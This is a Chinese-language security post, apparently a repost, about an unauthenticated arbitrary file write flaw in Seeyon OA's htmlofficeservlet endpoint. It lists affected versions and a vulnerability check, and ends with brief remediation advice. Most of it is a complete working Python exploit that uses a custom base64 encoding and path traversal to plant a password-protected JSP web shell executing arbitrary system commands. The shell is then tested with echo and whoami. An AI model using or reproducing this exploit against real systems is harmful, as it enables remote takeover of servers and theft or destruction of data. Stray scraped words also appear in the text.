近期爆出致遠 OA 系統的一些版本存在任意文件寫入漏洞,遠程攻擊者在無需登陸的狀況下可經過向 URL /seeyon/htmlofficeservlet POST 精心構造的數據便可向目標服務器寫入任意文件,寫入成功後可執行任意系統命令進而控制目標服務器。
目前已知易受攻擊的版本:
致遠A8-V5協同管理軟件 V6.1sp1
致遠A8+協同管理軟件 V7.0、V7.0sp一、V7.0sp二、V7.0sp3
致遠A8+協同管理軟件 V7.1html
若是成功利用此漏洞的攻擊者能夠在目標系統上寫入任意文件,執行任意代碼,更改或刪除數據。
值得注意的是該系統的默認權限很高,若是被攻擊者成功利用則可能會形成很大的危害。
驗證是否存在漏洞的方法:訪問URL /seeyon/htmlofficeservlet 出現以下內容可能存在漏洞
DBSTEP V3.0 0 21 0 htmoffice operate errjava
下面貼上一段野外poc:
該poc僅供學習研究,請勿破壞他人計算機!python
Poc首先是加密寫入文件的路徑,而後再獲取加密後的路徑寫入任意文件Getshellweb
python:shell
1 #coding=utf-8 2 import sys 3 import requests 4 5 def encode(origin_bytes): 6 """ 7 重構 base64 編碼函數 8 """ 9 # 將每一位bytes轉換爲二進制字符串 10 base64_charset = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6" 11 base64_bytes = ['{:0>8}'.format(bin(ord(b)).replace('0b', '')) for b in origin_bytes] 12 13 resp = '' 14 nums = len(base64_bytes) // 3 15 remain = len(base64_bytes) % 3 16 17 integral_part = base64_bytes[0:3 * nums] 18 while integral_part: 19 # 取三個字節,以每6比特,轉換爲4個整數 20 tmp_unit = ''.join(integral_part[0:3]) 21 tmp_unit = [int(tmp_unit[x: x + 6], 2) for x in [0, 6, 12, 18]] 22 # 取對應base64字符 23 resp += ''.join([base64_charset[i] for i in tmp_unit]) 24 integral_part = integral_part[3:] 25 26 if remain: 27 # 補齊三個字節,每一個字節補充 0000 0000 28 remain_part = ''.join(base64_bytes[3 * nums:]) + (3 - remain) * '0' * 8 29 # 取三個字節,以每6比特,轉換爲4個整數 30 # 剩餘1字節可構造2個base64字符,補充==;剩餘2字節可構造3個base64字符,補充= 31 tmp_unit = [int(remain_part[x: x + 6], 2) for x in [0, 6, 12, 18]][:remain + 1] 32 resp += ''.join([base64_charset[i] for i in tmp_unit]) + (3 - remain) * '=' 33 34 return resp 35 def getshell(urls): 36 url = urls + "/seeyon/htmlofficeservlet" 37 headers = { 38 "Pragma": "no-cache", 39 "Cache-Control": "no-cache", 40 "Upgrade-Insecure-Requests": "1", 41 "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", 42 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 43 "Accept-Language": "zh-CN,zh;q=0.9", 44 "Connection": "close", 45 } 46 file_name = encode('..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\checkload32.jsp') 47 payload = """DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r 48 OPTION=S3WYOSWLBSGr\r 49 currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r 50 CREATEDATE=wUghPB3szB3Xwg66\r 51 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r 52 originalFileId=wV66\r 53 originalCreateDate=wUghPB3szB3Xwg66\r 54 FILENAME="""+file_name+"""\r 55 needReadFile=yRWZdAS6\r 56 originalCreateDate=wLSGP4oEzLKAz4=iz=66\r 57 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("zs".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce""" 58 requests.post(url=url,data=payload,headers=headers) 59 result = requests.get(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd+/c+echo+ZuoShou_Jsp_Shell") 60 if 'ZuoShou_Jsp_Shell' in result.text : 61 print(u'Jsp:Getshell成功\t{}'.format(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd /c whoami")) 62 else : 63 print(u'Getshell失敗') 64 if __name__ == '__main__': 65 if len(sys.argv)!=2 : 66 print(u"\t\t用法:python poc.py 'http://loaclhost'") 67 else: 68 url = sys.argv[1] 69 getshell(url)
修復方案:
1:對路徑 /seeyon/htmlofficeservlet 進行限制訪問服務器
2:及時聯繫官網打補丁http://www.seeyon.com/Info/constant.htmlapp